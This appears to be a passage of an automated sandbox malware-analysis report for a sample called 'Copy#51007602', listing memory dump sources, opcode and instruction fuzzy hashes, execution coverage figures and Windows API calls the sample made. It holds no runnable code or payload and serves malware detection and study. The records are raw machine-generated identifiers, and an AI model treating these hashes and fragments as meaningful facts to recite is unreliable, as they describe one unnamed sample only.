                                                • Instruction ID: fc0a37d66e711b92a7e0ef12a8bcdfd9c397f2f67e7e374a227797a584d6e7c0
                                                • Opcode Fuzzy Hash: 99cb4623355a8da21f2912265992e74809a9535151f70103fb974399bcaa09e3
                                                • Instruction Fuzzy Hash: 94C00276E5001A9A8B00DAD9E4508DCB774EB94321B004066E224A6104D63015268B50
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2110369451.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f10000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d9208e95e5e505af0686983edebd2bd107f0dbb9f0b79309efe21fff2b5798fb
                                                • Instruction ID: 234c7b4ecd1dfd7635e595ba0558f134e264e691583d865dc27b407cad7df15a
                                                • Opcode Fuzzy Hash: d9208e95e5e505af0686983edebd2bd107f0dbb9f0b79309efe21fff2b5798fb
                                                • Instruction Fuzzy Hash: 4EC0122480A2848AE706CB144D207A07BB4EB06220F0403EA80A9C72D2CA301A40EB02
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                                • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2110369451.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f10000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9aaff40474fb2b63c6166f45a3a1c8b4d71a9f09715218f778bc342a89b4d4f3
                                                • Instruction ID: ffa44f134e25e312eb92d2ba68c3c3b44cd0cf819fae9096d0fb060772f5c503
                                                • Opcode Fuzzy Hash: 9aaff40474fb2b63c6166f45a3a1c8b4d71a9f09715218f778bc342a89b4d4f3
                                                • Instruction Fuzzy Hash: AEB0924AA0CAA44FD70382726838D242FB06A421813DA42FB9C43CA19BD008988A5221
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2125713429.0000000005470000.00000040.00000800.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5470000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5476fbd6f8c02076655ee2233e5ed7995881827aecf0276052164bb5834d459d
                                                • Instruction ID: bf43a64d6782094e4cdcd972f98924615a081b1fdbc406f6b2acaa9601434178
                                                • Opcode Fuzzy Hash: 5476fbd6f8c02076655ee2233e5ed7995881827aecf0276052164bb5834d459d
                                                • Instruction Fuzzy Hash: A9B09232010308EB86049F88E804896BF69AB587517008025A60986221CB32A862DAA4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 72550b7f60a9b9d6a0624dcfe85b4f845f7f5ed48fef7d368ac175af56ca0b42
                                                • Instruction ID: e27b7fc0b2f1a1dde5ff6678f8cd4ce7b936202fd5628c504050bb0646043041
                                                • Opcode Fuzzy Hash: 72550b7f60a9b9d6a0624dcfe85b4f845f7f5ed48fef7d368ac175af56ca0b42
                                                • Instruction Fuzzy Hash: 7CB092B1200200DFCB198B21E20486AB7B3FBE1301714C47CE40942254C73ACC91EA52
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2110369451.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f10000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4cda6d4746a2e38c83deb7ffb222da8fcb2e43bac01c4eb65116e22ace975bde
                                                • Instruction ID: a8e367a819ee58d096814b285438b23e94888a7d5e4b4a935f273ce050c21742
                                                • Opcode Fuzzy Hash: 4cda6d4746a2e38c83deb7ffb222da8fcb2e43bac01c4eb65116e22ace975bde
                                                • Instruction Fuzzy Hash: 16C09B34504405CFD709EF64EC5CF983765FB84341F00517590020A164DB342D85DB40
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f9f8170a45483e8143c2444d22f5bc697087bf34326ebc7b2e35023b7df28d33
                                                • Instruction ID: 206bdcff7d87ab7e2012be3cc9bf37a9fee60bd39a41d59bc0328c1cbc5760ee
                                                • Opcode Fuzzy Hash: f9f8170a45483e8143c2444d22f5bc697087bf34326ebc7b2e35023b7df28d33
                                                • Instruction Fuzzy Hash: 0EA012608481408FCF1096196108040AF11961011130447D8A00D40802451D04038152
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2110369451.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f10000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: edb4e109224acf72d137022f854e867a5641a8983822bca89559f19d3a0744c3
                                                • Instruction ID: 55175af2d0210644c4892146b3e65397a4d3cf09d4780b04c264d8b3211c68f1
                                                • Opcode Fuzzy Hash: edb4e109224acf72d137022f854e867a5641a8983822bca89559f19d3a0744c3
                                                • Instruction Fuzzy Hash: 63902232000E0C8B080023E2380CC08B30C82000003C00002B00C008028A2030000080
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8dfbcfc86ebb6412726fc553b91ef20eec7e8aca0e40008186a9bab9d90b1ed5
                                                • Instruction ID: d78efc9afd941ea9930db0f7e81417271f439393b1082e2c0a1f4b7a75cca920
                                                • Opcode Fuzzy Hash: 8dfbcfc86ebb6412726fc553b91ef20eec7e8aca0e40008186a9bab9d90b1ed5
                                                • Instruction Fuzzy Hash:
                                                Strings
                                                Memory Dump Source

                                                Execution Graph

                                                Execution Coverage:10.2%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:153
                                                Total number of Limit Nodes:17
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                • API String ID: 0-3723351465
                                                • Opcode ID: 10a61f88b03d15ad292216b2c88acc01808f7efb53bdb4d27f66dc6fecdd632e
                                                • Instruction ID: e89c8fd8db6b0a091c97b525b266aa8d6425160503451930454abf45486099bb
                                                • Opcode Fuzzy Hash: 10a61f88b03d15ad292216b2c88acc01808f7efb53bdb4d27f66dc6fecdd632e
                                                • Instruction Fuzzy Hash: 2AD26A34E00209CFDB64DF68C488A9DBBF6FF85314F5485AAD409AB265EB34ED85CB50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                • API String ID: 0-3723351465
                                                • Opcode ID: 80bface151475026d15f65d4acd8514c2a6b83ea554de6c8777639124904b41e
                                                • Instruction ID: ffecea02ca978cb8c67ff875ef0e70c666d59617ecb1a3bbf3ca5a75b631aaf2
                                                • Opcode Fuzzy Hash: 80bface151475026d15f65d4acd8514c2a6b83ea554de6c8777639124904b41e
                                                • Instruction Fuzzy Hash: 9B525E30E0020A9FDB64CF6DD6947AEBBB6FB45310F20892AE409DB355DA35DC81CB91

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $]q$$]q
                                                • API String ID: 0-127220927
                                                • Opcode ID: 118c2e9abc9209aad3a70f2c87a6478d2ef1e5a90d55ed389d3eed00f9874d2e
                                                • Instruction ID: 7d2b6f1b1f5204b25d6956433423a632e5172f57e3943f579cc2b605928f1cab
                                                • Opcode Fuzzy Hash: 118c2e9abc9209aad3a70f2c87a6478d2ef1e5a90d55ed389d3eed00f9874d2e
                                                • Instruction Fuzzy Hash: E702BE30B002199FDB54EF68E494AAEBBF2FF84354F108529D4199B395DB35EC86CB81
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e5f6167c7990dedb0cf2b8a26caf9ea12700523b91c952861294e7733d921ab3
                                                • Instruction ID: 568ef22d69bb047ac9b67388db9785e6c83e6f5c445802134efb842bf8fc1ebf
                                                • Opcode Fuzzy Hash: e5f6167c7990dedb0cf2b8a26caf9ea12700523b91c952861294e7733d921ab3
                                                • Instruction Fuzzy Hash: 15628D34F002099FDB64DB68D594AADBBF2EF84314F648469E40ADB395DB35EC42CB81
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6d7a1147c05a60a9b3c22996a2bb7c4a0f952315f276df774524998cf9d42348
                                                • Instruction ID: c160093ac983ca7d2f5f526f53a23c6015e2c6b714ada698a2eec66d7e99317b
                                                • Opcode Fuzzy Hash: 6d7a1147c05a60a9b3c22996a2bb7c4a0f952315f276df774524998cf9d42348
                                                • Instruction Fuzzy Hash: BF329F34F102099FDB54DB68E884BADBBB6FB88310F108529E515DB395DB34EC46CB91
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9e4aecdbed737d0e4b50a8c983a2a1142949c4142314c1c7083a5587e1b913f0
                                                • Instruction ID: 9fa2714a30b1cb0a65a894c019e79fa1cca1d9676f2b19bdf1c7072160136a26
                                                • Opcode Fuzzy Hash: 9e4aecdbed737d0e4b50a8c983a2a1142949c4142314c1c7083a5587e1b913f0
                                                • Instruction Fuzzy Hash: 0C22C375F002198FDF64CFA8C4906AEBBB2FF85318F208469D456AB344DA36DD42CB91

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                • API String ID: 0-1273862796
                                                • Opcode ID: 952c247eb38dc4617aaf4dffadf4f70c81337e251810a262a2b52b3106871f4d
                                                • Instruction ID: b55c8eacfff69f5b7912c656ecf88ff8bc6d578552786bf360d02a97d2b2baf7
                                                • Opcode Fuzzy Hash: 952c247eb38dc4617aaf4dffadf4f70c81337e251810a262a2b52b3106871f4d
                                                • Instruction Fuzzy Hash: FFE18E30F102098FCB69DF69D9946AEBBB6FF85304F208529D805AB355DB34EC46CB91

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 06FD2E86
                                                • GetCurrentThread.KERNEL32 ref: 06FD2EC3
                                                • GetCurrentProcess.KERNEL32 ref: 06FD2F00
                                                • GetCurrentThreadId.KERNEL32 ref: 06FD2F59
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255348099.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: f1a6e1f6ce80f73ae4a2530804450612cc602660f367d466f74281d3bda1d783
                                                • Instruction ID: 6506bd971aa8a1f7a5149e4596d1ac45687b6f9f21b254a998d2085158ca3325
                                                • Opcode Fuzzy Hash: f1a6e1f6ce80f73ae4a2530804450612cc602660f367d466f74281d3bda1d783
                                                • Instruction Fuzzy Hash: 5E5137B0D003098FDB54DFA9D648BAEBBF6FF48314F248459D119A7250D738A944CBA5

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 06FD2E86
                                                • GetCurrentThread.KERNEL32 ref: 06FD2EC3
                                                • GetCurrentProcess.KERNEL32 ref: 06FD2F00
                                                • GetCurrentThreadId.KERNEL32 ref: 06FD2F59
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255348099.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 15342f10642b265088ffb38ecd475c385bc4d9f4081371104b691be0eba54724
                                                • Instruction ID: 0723eb284720b92012ccc65f8c0019c3ed84462087220ed7b7fe9b871ad7465c
                                                • Opcode Fuzzy Hash: 15342f10642b265088ffb38ecd475c385bc4d9f4081371104b691be0eba54724
                                                • Instruction Fuzzy Hash: 6D5126B4D003098FDB54DFA9D648BAEBBF2FF48314F248459D119A7260D738A984CFA5

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $]q$$]q$$]q$$]q
                                                • API String ID: 0-858218434
                                                • Opcode ID: 6f6b66e56c0d4365248c58e7182b92443e08112cb9263ac4ab78bece3824c3bd
                                                • Instruction ID: ead51680c81cc53a09deb8b2ec118ae42d7162b2da3d3de440a1499b83bee9e3
                                                • Opcode Fuzzy Hash: 6f6b66e56c0d4365248c58e7182b92443e08112cb9263ac4ab78bece3824c3bd
                                                • Instruction Fuzzy Hash: 53915130F0020A9FDB54DF69D854BAEB7F6FF84244F508465C809EB345EE74AD468BA2

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $]q$$]q$$]q
                                                • API String ID: 0-182748909
                                                • Opcode ID: 18da603910e8dd52ac7bf2a2174a9c35f9f2a3038d2974a92ab66f791f0858d1
                                                • Instruction ID: 0cf343d73e2a0d02703677c12188447a0cc2eb24776dda3869fae17bc896116f
                                                • Opcode Fuzzy Hash: 18da603910e8dd52ac7bf2a2174a9c35f9f2a3038d2974a92ab66f791f0858d1
                                                • Instruction Fuzzy Hash: 40625E30B0020A9FCB55DF68E594A5EBBF6FF84354B208928D0099F769DB75EC46CB81

                                                Control-flow Graph
                                                [Graph beginning at block 6fe4b80-6fe4ba4; legend: executed / not executed]
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: fbq$XPbq$\Obq
                                                • API String ID: 0-4057264190
                                                • Opcode ID: 66c61799904d174c3f18004c1a711dec3ffbde0ae7a8b69e9bc045d32139baf8
                                                • Instruction ID: 047d4494fcb91eba7f69d3d9d4842893468c9058b1555648fd48afe5359e4e37
                                                • Opcode Fuzzy Hash: 66c61799904d174c3f18004c1a711dec3ffbde0ae7a8b69e9bc045d32139baf8
                                                • Instruction Fuzzy Hash: 02616174F002099FEB649FA5C4547AEBBF6FB88300F208429E109AB395DF755C418F91

                                                Control-flow Graph
                                                [Graph beginning at block 6fe914f-6fe9185; legend: executed / not executed]
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $]q$$]q
                                                • API String ID: 0-127220927
                                                • Opcode ID: c9b6b462dbd57b1453c90111bbb341348fcc2c5ef7698f6ea96e41d9139b36e0
                                                • Instruction ID: 939c4ffc3b9928e510d5fca318a8ef606af7451c679908a88a1b424878d9c5c3
                                                • Opcode Fuzzy Hash: c9b6b462dbd57b1453c90111bbb341348fcc2c5ef7698f6ea96e41d9139b36e0
                                                • Instruction Fuzzy Hash: 0E517030F001069FDB54DB78E854B6EB7F6EFC4654F108469C809DB385EE74AD468BA1

                                                Control-flow Graph
                                                [Graph beginning at block 6fdb318-6fdb337; legend: executed / not executed]
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 06FDB57E
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255348099.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 2632ddbfbc08f15c0b68d509f459364459f3e3471abb20571d52b7ff6f4ab365
                                                • Instruction ID: 421de2ac2a48e7faaa5e76a25c359c093bd6a9819d59d0aa2c965db0fea8c195
                                                • Opcode Fuzzy Hash: 2632ddbfbc08f15c0b68d509f459364459f3e3471abb20571d52b7ff6f4ab365
                                                • Instruction Fuzzy Hash: A28146B0A00B058FD764DF2AD44575ABBF2FF89204F088A2ED49AD7A50DB35F845CB91
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3234965380.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_30f0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 571f9db9f8f3aa24dcd3f809c479240b2e2ef83e7f572b7a9c9c3ddae7e5513c
                                                • Instruction ID: ad71080202bff72b88b1310c01080bd63609838266e3739865064ada71f4f38f
                                                • Opcode Fuzzy Hash: 571f9db9f8f3aa24dcd3f809c479240b2e2ef83e7f572b7a9c9c3ddae7e5513c
                                                • Instruction Fuzzy Hash: E1412672D003498FCB14DFA9D4446EEBBF5AF89310F14856AD904A7751EB38A845CBD0
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06FDD622
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255348099.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 293dabc6c54c1dba7820588679c31864434b224f446eac6e1b2597d9378e9e78
                                                • Instruction ID: 18728a1207f33dc1e20f787e25eeaf4a42aac2980417079414d2171eaecd98d2
                                                • Opcode Fuzzy Hash: 293dabc6c54c1dba7820588679c31864434b224f446eac6e1b2597d9378e9e78
                                                • Instruction Fuzzy Hash: BF51D0B1D00349DFDB14CFA9C984ADEBFB6BF49310F24852AE419AB250D775A885CF90
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06FDD622
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255348099.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 1b4728aef3207b628f280ae866bd53b7a02d3b88f6a63cf5b421890a29473bac
                                                • Instruction ID: c87d7fc8afc4b77e68c5806ea55af24d5ef53dfef10a63fb275ae388cd025dd0
                                                • Opcode Fuzzy Hash: 1b4728aef3207b628f280ae866bd53b7a02d3b88f6a63cf5b421890a29473bac
                                                • Instruction Fuzzy Hash: A941B0B1D003099FDB14CF99C984ADEBBB6FF49314F24812AE819AB250D775A845CF90
                                                APIs
                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 06FDFD11
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255348099.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: CallProcWindow
                                                • String ID:
                                                • API String ID: 2714655100-0
                                                • Opcode ID: 7e684d012fbcca5aaced36eda2bc50c81554134af429078e723da313cdd7e7b1
                                                • Instruction ID: 582a152f0090f579d8b1042bd681c46adf7b74f07e6b6bd7203447e498649b4c
                                                • Opcode Fuzzy Hash: 7e684d012fbcca5aaced36eda2bc50c81554134af429078e723da313cdd7e7b1
                                                • Instruction Fuzzy Hash: B9412AB5900309CFDB54DF99C448EAABBF6FF89314F288459D519AB321D774A841CFA0
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06FD30D7
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255348099.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: d4a04decd34c58fb7d5c4b77a1b1cfc1e63b358d39c4fd03026e77a540c04e9b
                                                • Instruction ID: 209a9fb05ab6e49334c5cc713b7cf5f4221bd0c9282ab792d9af2ab52268c817
                                                • Opcode Fuzzy Hash: d4a04decd34c58fb7d5c4b77a1b1cfc1e63b358d39c4fd03026e77a540c04e9b
                                                • Instruction Fuzzy Hash: 8321E2B5D002089FDB10CFAAD984AEEBFF5FB48310F14801AE918A7350D379A944CFA1
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06FD30D7
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255348099.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: f4313ebb9c401e884439e445242d77cc93a5637601c22e6615c9a9c91adffb48
                                                • Instruction ID: c138bbd866308b6da2e6f31238b7b93eb0b4f6b0f9c0c8fa72ca4771f2a5a73a
                                                • Opcode Fuzzy Hash: f4313ebb9c401e884439e445242d77cc93a5637601c22e6615c9a9c91adffb48
                                                • Instruction Fuzzy Hash: C721C4B5D002489FDB10CF9AD984ADEFBF9FB49310F14841AE918A7350D379A944CFA5
                                                APIs
                                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,030FEB32), ref: 030FEC1F
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3234965380.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_30f0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID:
                                                • API String ID: 1890195054-0
                                                • Opcode ID: 2deb594d794376689b58f9eca515ea20ee7bf2baf31154f21cbb87df81b058fb
                                                • Instruction ID: 3b3b6e30e4b3b490d6cfea8757f85cdcd0e07efba80a644feecf70d4de967a11
                                                • Opcode Fuzzy Hash: 2deb594d794376689b58f9eca515ea20ee7bf2baf31154f21cbb87df81b058fb
                                                • Instruction Fuzzy Hash: 461112B1C016599FCB10DF9AC544BAEFBF4EF48720F14816AE918A7250D778A944CFE1
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,06FDB5F9,00000800,00000000,00000000), ref: 06FDB7EA
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255348099.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: cc6c2e3eb1f5decf7114a69577d6d2945353eb057e8c6f5c82aea4c9b8087ea1
                                                • Instruction ID: ccfc46ddd0c04afe4f241a0c904080d2fc0f44b9d66a37e4467baa593e2662fa
                                                • Opcode Fuzzy Hash: cc6c2e3eb1f5decf7114a69577d6d2945353eb057e8c6f5c82aea4c9b8087ea1
                                                • Instruction Fuzzy Hash: 651114B6D002499FDB10DF9AC444ADEFBF9EF48310F14842EE519A7210C379A545CFA5
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,06FDB5F9,00000800,00000000,00000000), ref: 06FDB7EA
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255348099.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 26ff8e525449e3cefeedfa3786aea5e78f6e5a11678060468cd6883a7a07337a
                                                • Instruction ID: c7fc30702aa3a042965c2da89b87b10c07167733030834dc917aed6667f1aefc
                                                • Opcode Fuzzy Hash: 26ff8e525449e3cefeedfa3786aea5e78f6e5a11678060468cd6883a7a07337a
                                                • Instruction Fuzzy Hash: 1111D0BAD002499FDB10CF9AD944ADEFBF9EF48310F14842AD419A7210C779A545CFA4
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 06FDB57E
                                                Memory Dump Source
